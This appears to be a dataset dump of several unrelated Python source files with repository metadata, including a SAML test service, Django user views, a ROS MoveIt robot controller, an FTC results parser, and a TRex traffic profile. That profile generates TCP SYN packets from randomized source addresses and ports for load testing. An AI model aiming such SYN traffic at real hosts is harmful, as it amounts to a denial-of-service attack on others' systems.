self.acs_handler[key] = ACS(_sso.sp, cache=self.cache,
lookup=self.lookup,
res_db=self.res_db,
policy=self.policy, ec_test=key)
def _cp_dispatch(self, vpath):
# Only get here if vpath != None
ent = cherrypy.request.remote.ip
logger.info('ent:{}, vpath: {}'.format(ent, vpath))
if vpath[0] == 'static':
return self
if len(vpath) >= 2:
# acs/<ec>/post or acs/<ec>/redirect
if vpath[0] == 'acs':
# if cherrypy.request.method == 'POST':
# if cherrypy.request.process_request_body is True:
# try:
# _response = as_unicode(cherrypy.request.body.read())
# except ValueError:
# raise ValueError('No body')
# else:
# cherrypy.request.params['response'] = _response
# else:
# cherrypy.request.params['response'] = ''
vpath.pop(0) # remove the 'acs'
if vpath[0] in ['post', 'redirect']:
ec = ''
cherrypy.request.params['binding'] = BINDING_MAP[vpath[0]]
vpath.pop(0)
else:
ec = vpath.pop(0)
if vpath[0] in ['post', 'redirect']:
cherrypy.request.params['binding'] = BINDING_MAP[
vpath[0]]
vpath.pop(0)
else:
raise UnSupported('binding: ')
return self.acs_handler[ec]
return self
@cherrypy.expose
def test(self, **kwargs):
resp = Response(mako_template="test.mako",
template_lookup=self.lookup,
headers=[])
str_ec_seq = []
for ec in self.ec_sequence:
str_ec_seq.append(str(ec))
argv = {
# "ec_seq_json": json.dumps(EC_SEQUENCE),
"ec_seq": str_ec_seq,
"ec_info": self.ec_information
}
return conv_response(resp, **argv)
@cherrypy.expose
def overview(self, **kwargs):
resp = Response(mako_template="test_overview.mako",
template_lookup=self.lookup,
headers=[])
str_ec_seq = []
for ec in self.ec_sequence:
str_ec_seq.append(str(ec))
argv = {
# "ec_seq_json": json.dumps(EC_SEQUENCE),
"ec_seq": json.dumps(str_ec_seq),
"ec_info": json.dumps(self.ec_information),
"test_results": json.dumps(self.res_db.get_overview_data())
}
return conv_response(resp, **argv)
@cherrypy.expose
def disco(self, **kwargs):
entity_id = kwargs["entityID"]
sid = kwargs["sid"]
came_from = self.cache.outstanding_queries[sid]
_sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
resp = _sso._redirect_to_auth(_sso.sp, entity_id, came_from)
# Add cookie
kaka = make_cookie("ve_disco", entity_id, "SEED_SAW")
resp.headers.append(kaka)
return conv_response(resp)
@cherrypy.expose
def login(self):
_sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
return _sso.index()
@cherrypy.expose
def ecat(self, **kwargs):
if kwargs['c'] == 'base':
_sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
else:
_sso = SSO(self.sp[kwargs['c']], cache=self.cache, **self.sso_args)
return _sso.index('ecat')
| 4,376 | 292 | 23 |
53b07645beb6a37bb39e8fb6d9e458b88789c6b6 | 770 | py | Python | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | # Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
platform = platform.system()
if platform == 'Darwin': # for Unix (MacOS, Linux)
text = "clear"
elif platform == 'Windows': # for Windows
text = 'cls'
if __name__ == '__main__':
input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
from clearterminal import * -----> clear()
import clearterminal -----> clearterminal.clear()''')
clear()
| 23.333333 | 59 | 0.68961 | # Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
platform = platform.system()
if platform == 'Darwin': # for Unix (MacOS, Linux)
text = "clear"
elif platform == 'Windows': # for Windows
text = 'cls'
def clear():
os.system(text)
if __name__ == '__main__':
input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
from clearterminal import * -----> clear()
import clearterminal -----> clearterminal.clear()''')
clear()
| 11 | 0 | 23 |
73c231f843e281f5793ac6d65c263fc1d0984a82 | 2,629 | py | Python | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
user_logged_in.connect(logged_in_message)
user_logged_out.connect(logged_out_message)
| 31.674699 | 83 | 0.732218 | # -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
class UserDetailView(LoginRequiredMixin, DetailView):
template_name = 'users/user_detail.html'
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
form_class = UserUpdateForm
model = User
template_name = 'users/user_update.html'
# send the user back to their own page after a successful update
def get_success_url(self):
return reverse("users:redirect")
def get_object(self):
# Only get the User record for the user making the request
return User.objects.get(username=self.request.user.username)
def form_valid(self, form):
# Sets new password if user defined one
if form.cleaned_data['password1']:
form.instance.set_password(form.cleaned_data['password1'])
messages.success(self.request, 'Your Account Settings has been saved.')
return super(UserUpdateView, self).form_valid(form)
class UserListView(LoginRequiredMixin, ListView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
def logged_in_message(sender, user, request, **kwargs):
messages.success(
request,
"Welcome, %s! You have been successfully logged in." % user.display_name,
fail_silently=True)
user_logged_in.connect(logged_in_message)
def logged_out_message(sender, user, request, **kwargs):
messages.success(request, "You have been successfully logged out.",
fail_silently=True)
user_logged_out.connect(logged_out_message)
| 942 | 760 | 138 |
e1a7bac7b331fd02cd759384caa0119eac149b9d | 696 | py | Python | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 4 | 2017-10-24T11:20:19.000Z | 2021-01-13T02:41:29.000Z | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 9 | 2019-03-01T06:14:39.000Z | 2021-01-18T23:48:42.000Z | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 3 | 2020-05-18T07:08:43.000Z | 2020-07-19T14:18:29.000Z | from should_be import core as sc
import unittest
| 26.769231 | 77 | 0.635057 | from should_be import core as sc
import unittest
class TestMixin(sc.BaseMixin):
target_class = object
def should_cheese(self):
self.should_follow(True)
class TestMixinUtils(unittest.TestCase):
def test_default_mix(self):
TestMixin.mix()
(object()).should_cheese()
def test_static_mix_method(self):
sc.BaseMixin.mix_method(object, 'should_static', lambda: 3,
method_type='static')
object.should_static()
def test_class_mix_method(self):
sc.BaseMixin.mix_method(object, 'should_class', lambda cls: str(cls),
method_type='class')
object.should_class()
| 438 | 81 | 126 |
5189a017d03f3a9e16de5ab89f9496ace97a2cf5 | 12,191 | py | Python | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 2 | 2021-08-12T18:45:27.000Z | 2021-12-27T04:28:37.000Z | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 11 | 2021-07-09T14:49:30.000Z | 2022-03-04T16:59:54.000Z | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 1 | 2021-12-27T04:28:41.000Z | 2021-12-27T04:28:41.000Z | #!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
"""
Convenience method for testing if a list of values are within a tolerance of their counterparts in another list
@param: goal A list of floats, a Pose or a PoseStamped
@param: actual A list of floats, a Pose or a PoseStamped
@param: tolerance A float
@returns: bool
"""
all_equal = True
if type(goal) is list:
for index in range(len(goal)):
if abs(actual[index] - goal[index]) > tolerance:
return False
elif type(goal) is geometry_msgs.msg.PoseStamped:
return all_close(goal.pose, actual.pose, tolerance)
elif type(goal) is geometry_msgs.msg.Pose:
return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
return True
class moveManipulator(object):
"""moveManipulator Class""" | 36.71988 | 120 | 0.703634 | #!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
"""
Convenience method for testing if a list of values are within a tolerance of their counterparts in another list
@param: goal A list of floats, a Pose or a PoseStamped
@param: actual A list of floats, a Pose or a PoseStamped
@param: tolerance A float
@returns: bool
"""
all_equal = True
if type(goal) is list:
for index in range(len(goal)):
if abs(actual[index] - goal[index]) > tolerance:
return False
elif type(goal) is geometry_msgs.msg.PoseStamped:
return all_close(goal.pose, actual.pose, tolerance)
elif type(goal) is geometry_msgs.msg.Pose:
return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
return True
class moveManipulator(object):
"""moveManipulator Class"""
def __init__(self, eef):
super(moveManipulator, self).__init__()
## First initialize `moveit_commander`_ and a `rospy`_ node:
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('node_moveManipulator', anonymous=True)
# Setup Variables needed for Moveit_Commander
self.object_name = ''
self.robot = moveit_commander.RobotCommander()
self.scene = moveit_commander.PlanningSceneInterface()
self.group_name = eef # CHANGE THIS TO MATCH YOUR ROBOT'S MOVEIT CONFIG!
self.move_group = moveit_commander.MoveGroupCommander(self.group_name)
self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
moveit_msgs.msg.DisplayTrajectory,
queue_size=20)
self.planning_frame = self.move_group.get_planning_frame()
self.eef_link = self.move_group.get_end_effector_link()
self.group_names = self.robot.get_group_names()
def set_vel(self,max_vel):
## Wrapper for Moveit Commander's max_velocity
## Allowed range... 0.0 <= max_vel <= 1.0
self.move_group.set_max_velocity_scaling_factor(max_vel)
def set_accel(self,max_accel):
## Wrapper for Moveit Commander's max_acceleration
## Allowed range... 0.0 <= max_vel <= 1.0
self.move_group.set_max_acceleration_scaling_factor(max_accel)
def lookup_pose(self):
# Get Current Pose of the robot
pose = self.move_group.get_current_pose(self.eef_link).pose
#print(pose)
#print(self.move_group.get_current_rpy(self.eef_link))
return pose
def goto_all_zeros(self):
## Go to "ALL-Zeros" position
## Get Current Position & Go to "All-Zeros" Position
## Trajectory Type: JOINT MOTION defined by joint position
# Get Current Position
joint_goal = self.move_group.get_current_joint_values()
# Define "All-Zeros" Position
joint_goal[0] = 0
joint_goal[1] = 0
joint_goal[2] = 0
joint_goal[3] = 0
joint_goal[4] = 0
joint_goal[5] = 0
# Send action to move-to defined position
self.move_group.go(joint_goal, wait=True)
# Calling ``stop()`` ensures that there is no residual movement
self.move_group.stop()
# For testing:
current_joints = self.move_group.get_current_joint_values()
return all_close(joint_goal, current_joints, 0.01)
def goto_named_target(self, target):
## Go to named "target" position
## Trajectory Type: JOINT MOTION defined by joint position
# Send action to move-to defined position
self.move_group.set_named_target(target)
self.move_group.plan()
self.move_group.go(wait=True)
# Calling ``stop()`` ensures that there is no residual movement
self.move_group.stop()
# For testing:
current_joints = self.move_group.get_current_joint_values()
return all_close(target, current_joints, 0.01)
def plan_cartesian_lineup_path(self, down):
## Plan Cartesian Path to throw object
# Specify a list of waypoints
waypoints = []
# Example - Commented Out
wpose = self.move_group.get_current_pose().pose
wpose.position.z += down # Move up (z)
# Forward (x)
waypoints.append(copy.deepcopy(wpose))
# We want the Cartesian path to be interpolated at a resolution of 5 cm
# which is why we will specify 0.05 as the eef_step in Cartesian
# translation. We will disable the jump threshold by setting it to 0.0,
# ignoring the check for infeasible jumps in joint space, which is sufficient
# for this tutorial.
(plan, fraction) = self.move_group.compute_cartesian_path(
waypoints, # waypoints to follow
0.05, # eef_step
0.0) # jump_threshold
# Note: We are just planning, not asking move_group to actually move the robot yet:
return plan
def goto_Quant_Orient(self,pose):
## GOTO Pose Using Cartesian + Quaternion Pose
# Get Current Orientation in Quanternion Format
# http://docs.ros.org/en/api/geometry_msgs/html/msg/Pose.html
#q_poseCurrent = self.move_group.get_current_pose().pose.orientation
#print(q_poseCurrent)
# Using Quaternion's for Angle
# Conversion from Euler(rotx,roty,rotz) to Quaternion(x,y,z,w)
# Euler Units: RADIANS
# http://docs.ros.org/en/melodic/api/tf/html/python/transformations.html
# http://wiki.ros.org/tf2/Tutorials/Quaternions
# http://docs.ros.org/en/api/geometry_msgs/html/msg/Quaternion.html
if isinstance(pose, list):
pose_goal = geometry_msgs.msg.Pose()
pose_goal.position.x = pose[0]
pose_goal.position.y = pose[1]
pose_goal.position.z = pose[2]
# Convert Euler Orientation Request to Quanternion
if isinstance(pose, list) and len(pose) == 6:
# Assuming Euler-based Pose List
q_orientGoal = quaternion_from_euler(pose[3],pose[4],pose[5],axes='sxyz')
pose_goal.orientation.x = q_orientGoal[0]
pose_goal.orientation.y = q_orientGoal[1]
pose_goal.orientation.z = q_orientGoal[2]
pose_goal.orientation.w = q_orientGoal[3]
if isinstance(pose, list) and len(pose) == 7:
# Assuming Quant-based Pose List
q_orientGoal = pose[-4:]
pose_goal.orientation.x = q_orientGoal[0]
pose_goal.orientation.y = q_orientGoal[1]
pose_goal.orientation.z = q_orientGoal[2]
pose_goal.orientation.w = q_orientGoal[3]
else:
#Assuming type is already in message format
pose_goal = pose
self.move_group.set_pose_target(pose_goal)
## Call the planner to compute the plan and execute it.
plan = self.move_group.go(wait=True)
# Calling `stop()` ensures that there is no residual movement
self.move_group.stop()
# It is always good to clear your targets after planning with poses.
# Note: there is no equivalent function for clear_joint_value_targets()
self.move_group.clear_pose_targets()
# For testing:
current_pose = self.move_group.get_current_pose().pose
#return all_close(pose_goal, current_pose, 0.01)
def goto_joint_posn(self,joint_goal):
## Go to Joint Defined position
## Get Current Position & Go to "All-Zeros" Position
## Trajectory Type: JOINT MOTION defined by joint position
# Send action to move-to defined position
self.move_group.go(joint_goal, wait=True)
# Calling ``stop()`` ensures that there is no residual movement
self.move_group.stop()
# For testing:
current_joints = self.move_group.get_current_joint_values()
return all_close(joint_goal, current_joints, 0.01)
def send_io(self, request):
## Wrapper for rosservice to open/close gripper using Read/Write IO
# Wait for ros services to come up
rospy.wait_for_service('read_single_io')
rospy.wait_for_service('write_single_io')
# Create Handle for Service Proxy's
try:
read_single_io = rospy.ServiceProxy('read_single_io', ReadSingleIO)
write_single_io = rospy.ServiceProxy('write_single_io', WriteSingleIO)
except rospy.ServiceException as e:
print("Gripper IO Service Call failed: %s"%e)
# Send 'Write' IO Message
try:
write_status = write_single_io(10010, request)
except:
print("An exception occured. Unable to write to Single IO.")
# Call Read Service to check current position
read_status = read_single_io(10011).value
if read_status:
print('Gripper is Closed')
else:
print('Gripper is Open')
return read_status
def execute_plan(self, plan):
## Execute a Plan
## Use execute if you would like the robot to follow a plan that has already been computed:
self.move_group.execute(plan, wait=True)
def add_object(self, timeout=4):
## Add object Element to Collision Scene
# Create object
object_pose = geometry_msgs.msg.PoseStamped()
object_pose.header.frame_id = 'base_link'
object_pose.pose.orientation.w = 1.0
object_pose.pose.position.y = 0.6
object_pose.pose.position.z = 0.01
self.object_name = "object"
# Add object to scene
self.scene.add_box(self.object_name, object_pose, size=(0.005, 0.005, 0.005))
# Alternively, Use Mesh of Object. (mixed success with this. See moveit webpage)
#self.scene.add_mesh(self.object_name, object_pose, filename="$(find object)/meshes/object-model.stl", size=(1,1,1))
return self.wait_for_state_update(object_is_known=True, timeout=timeout)
def attach_object(self, timeout=4):
## Attaching object to the Robot
grasping_group = 'bot_mh5l'
touch_links = self.robot.get_link_names(group=grasping_group)
# Attach object to Robot EEF
self.scene.attach_box(self.eef_link, self.object_name, touch_links=touch_links)
#self.scene.attach_mesh(self.eef_link, self.object_name, touch_links=touch_links)
# We wait for the planning scene to update.
return self.wait_for_state_update(object_is_attached=True, object_is_known=False, timeout=timeout)
def detach_object(self, timeout=4):
## Detaching object from the Robot
self.scene.remove_attached_object(self.eef_link, name=self.object_name)
# Wait for the planning scene to update.
return self.wait_for_state_update(object_is_known=True, object_is_attached=False, timeout=timeout)
def remove_object(self, timeout=4):
## Removing Objects from the Planning Scene
## **Note:** The object must be detached before we can remove it from the world
self.scene.remove_world_object(self.object_name)
def wait_for_state_update(self, object_is_known=False, object_is_attached=False, timeout=4):
## wait_for_scene_update
## This helps with collision planning.
start = rospy.get_time()
seconds = rospy.get_time()
while (seconds - start < timeout) and not rospy.is_shutdown():
# Test if the object is in attached objects
attached_objects = self.scene.get_attached_objects([self.object_name])
is_attached = len(attached_objects.keys()) > 0
# Test if the object is in the scene.
# Note that attaching the object will remove it from known_objects
is_known = self.object_name in self.scene.get_known_object_names()
# Test if we are in the expected state
if (object_is_attached == is_attached) and (object_is_known == is_known):
return True
# Sleep so that we give other threads time on the processor
rospy.sleep(0.1)
seconds = rospy.get_time()
# If we exited the while loop without returning then we timed out
return False | 10,228 | 0 | 396 |
b4d0c4319db41b600e68c367ddf3793d8cf65162 | 1,222 | py | Python | client/test/test_packet.py | estcube/telemetry-forwarding-client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | 3 | 2020-06-11T12:34:25.000Z | 2020-09-16T12:06:32.000Z | client/test/test_packet.py | estcube/telemetry-forwarding-client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | 57 | 2020-09-16T09:11:04.000Z | 2022-02-28T01:32:13.000Z | client/test/test_packet.py | estcube/Telemetry-Forwarding-Client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | null | null | null | from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
hk_packet = generate_icp()
for byte in hk_packet:
print('{:02x}'.format(byte).upper(), end="")
print()
target = Main.from_bytes(hk_packet)
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| 21.438596 | 55 | 0.711948 | from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
def generate_normal_beacon() -> bytearray:
common = CommonData().createData()
obc = ObcData().createData()
aocs = AocsData().createData()
hk_packet = common
hk_packet.extend(obc)
hk_packet.extend(aocs)
return hk_packet
def generate_icp():
beacon_data = generate_normal_beacon()
f = bytearray()
f.append(0x01)
f.append(0x04)
f.append(len(beacon_data))
f.append(0xF7)
f += random.randint(0, 16777214).to_bytes(3, "big")
f.append(0x03) # TODO Mode: NOW
f += beacon_data
f.append(0x05) # TODO CRC
f.append(0x05)
return f
hk_packet = generate_icp()
for byte in hk_packet:
print('{:02x}'.format(byte).upper(), end="")
print()
target = Main.from_bytes(hk_packet)
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| 556 | 0 | 46 |
f5f32bf9fc9897c7d19c064ce63795ce31ac13eb | 415 | py | Python | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | 1 | 2020-09-15T07:29:18.000Z | 2020-09-15T07:29:18.000Z | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | null | null | null | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | null | null | null | ##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
| 24.411765 | 64 | 0.722892 | ##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
class DaysSelector:
__metaclass__ = ABCMeta
## Select representative days from time series.
# @param data Data with the time series.
# @return Dictionary with the select days and their weights.
@abstractmethod
def selectDays(self, data):
return None
| 26 | 235 | 22 |
0a3ebda6000b9985a6e8a6936744f41e409200aa | 1,516 | py | Python | scripts/automation/regression/stateless_tests/profiles/syn.py | timgates42/trex-core | efe94752fcb2d0734c83d4877afe92a3dbf8eccd | [
"Apache-2.0"
] | 956 | 2015-06-24T15:04:55.000Z | 2022-03-30T06:25:04.000Z | scripts/automation/regression/stateless_tests/profiles/syn.py | angelyouyou/trex-core | fddf78584cae285d9298ef23f9f5c8725e16911e | [
"Apache-2.0"
] | 782 | 2015-09-20T15:19:00.000Z | 2022-03-31T23:52:05.000Z | scripts/automation/regression/stateless_tests/profiles/syn.py | angelyouyou/trex-core | fddf78584cae285d9298ef23f9f5c8725e16911e | [
"Apache-2.0"
] | 429 | 2015-06-27T19:34:21.000Z | 2022-03-23T11:02:51.000Z | from trex.stl.api import *
| 35.255814 | 102 | 0.396438 | from trex.stl.api import *
class Prof():
def get_streams(self, direction = 0, pkt_size = 64, **kwargs):
size = pkt_size - 4; # HW will add 4 bytes ethernet FCS
# TCP SYN
base_pkt = Ether()/IP(dst="48.0.0.1")/TCP(dport=80,flags="S")
pad = max(0, size - len(base_pkt)) * 'x'
# vm
vm = STLScVmRaw( [ STLVmFlowVar(name="ip_src",
min_value="16.0.0.0",
max_value="18.0.0.254",
size=4, op="random"),
STLVmFlowVar(name="src_port",
min_value=1025,
max_value=65000,
size=2, op="random"),
STLVmWrFlowVar(fv_name="ip_src", pkt_offset= "IP.src" ),
STLVmFixIpv4(offset = "IP"), # fix checksum
STLVmWrFlowVar(fv_name="src_port",
pkt_offset= "TCP.sport") # fix udp len
]
)
pkt = STLPktBuilder(pkt = base_pkt,
vm = vm)
return STLStream(packet = pkt,
random_seed = 0x1234,# can be remove. will give the same random value any run
mode = STLTXCont())
def register():
return Prof()
| 1,423 | -8 | 73 |
39c95dbf7cfd4d5c5459f3becb477b2b40029973 | 5,465 | py | Python | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | 1 | 2019-05-21T08:10:41.000Z | 2019-05-21T08:10:41.000Z | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | null | null | null | helpers/results_page_helper.py | guineawheek/ftcdata | f6515da93c7a788b00b3e88d4c507c2140d7e385 | [
"MIT"
] | null | null | null | import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
@classmethod
@classmethod
@classmethod
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
"""has_hs=False is necessary for rly old data"""
try:
event_key = matches[0][0].event_key
except IndexError:
logging.warning("can't load rankings on zero length match table!")
return
high_scores, wlt = cls.highscores_wlt(matches)
ret = []
#first = True
for tr in table.find_all("tr"):
td_tags = list(tr.find_all("td"))
if not td_tags:
continue
td = [td.get_text() for td in td_tags]
tkey = "ftc" + td[1]
twlt = wlt[tkey]
if not has_hs:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=high_scores.get(tkey, 0),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
else:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=int(td[5]),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
ret.append(r)
return ret
@classmethod
| 41.401515 | 188 | 0.543458 | import logging
from models import Event, Ranking, Award, Match, MatchScore
from bs4 import BeautifulSoup
from db.orm import orm
class ResultsPageHelper:
"""Helper methods to parse the output from FTC Live Scoring Software pages"""
res_map = {"R": "red", "B": "blue", "T": "tie"}
@classmethod
def parse_match_code(cls, mname):
match_code = mname.split('-')
comp_level = match_code[0].lower()
mnum = int(match_code[-1])
set_number = int(match_code[1]) if len(match_code) == 3 else None
return comp_level, mnum, set_number
@classmethod
def _mk_match(cls, event_key, mname, result, red_a, blue_a):
comp_level, mnum, set_number = cls.parse_match_code(mname)
match = Match(event_key=event_key, comp_level=comp_level, match_number=mnum, set_number=set_number)
scores, winner = result.split()
red_score, blue_score = scores.split('-')
match.winner = cls.res_map[winner]
match.gen_keys()
red = MatchScore(key=match.red_key, alliance_color="red", event_key=event_key, match_key=match.key, dqed=[], total=int(red_score), teams=[f'ftc{s.strip("*")}' for s in red_a])
red.surrogates = [f'ftc{s.strip("*")}' for s in red_a if s.endswith('*')]
blue = MatchScore(key=match.blue_key, alliance_color="blue", event_key=event_key, match_key=match.key, dqed=[], total=int(blue_score), teams=[f'ftc{s.strip("*")}' for s in blue_a])
blue.surrogates = [f'ftc{s.strip("*")}' for s in blue_a if s.endswith('*')]
return (match, red, blue)
@classmethod
def load_matches(cls, table, event_key):
red_a, blue_a = None, None
mname, result = "", ""
matches = []
for tr in table.find_all("tr"):
td = [td.get_text() for td in tr.find_all("td")]
if len(td) == 4:
if red_a:
matches.append(cls._mk_match(event_key, mname, result, red_a, blue_a))
mname = td[0]
result = td[1]
red_a, blue_a = [td[2]], [td[3]]
elif len(td) == 2:
red_a.append(td[0])
blue_a.append(td[1])
matches.append(cls._mk_match(event_key, mname, result, red_a, blue_a))
return matches
@classmethod
def load_match_details(cls, table, event_key):
matches = []
for tr in table.find_all("tr"):
td = [td.get_text() for td in tr.find_all("td")]
if len(td) < 16:
continue
match, red, blue = cls._mk_match(event_key, td[0], td[1], td[2].split(), td[3].split())
red.total, blue.total = int(td[4]), int(td[10])
red.auto, blue.auto = int(td[5]), int(td[11])
red.auto_bonus, blue.auto_bonus = int(td[6]), int(td[12])
red.teleop, blue.teleop = int(td[7]), int(td[13])
red.endgame, blue.endgame = int(td[8]), int(td[14])
red.penalty, blue.penalty = int(td[9]), int(td[15])
matches.append((match, red, blue))
return matches
@classmethod
def load_rankings(cls, table, matches, has_hs=True):
"""has_hs=False is necessary for rly old data"""
try:
event_key = matches[0][0].event_key
except IndexError:
logging.warning("can't load rankings on zero length match table!")
return
high_scores, wlt = cls.highscores_wlt(matches)
ret = []
#first = True
for tr in table.find_all("tr"):
td_tags = list(tr.find_all("td"))
if not td_tags:
continue
td = [td.get_text() for td in td_tags]
tkey = "ftc" + td[1]
twlt = wlt[tkey]
if not has_hs:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=high_scores.get(tkey, 0),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[5]))
else:
r = Ranking(event_key=event_key, team_key=tkey, rank=int(td[0]), qp_rp=int(td[3]), rp_tbp=int(td[4]),
high_score=int(td[5]),
wins=twlt[0], losses=twlt[1], ties=twlt[2], dqed=0, played=int(td[6]))
ret.append(r)
return ret
@classmethod
def highscores_wlt(cls, matches):
teams = set()
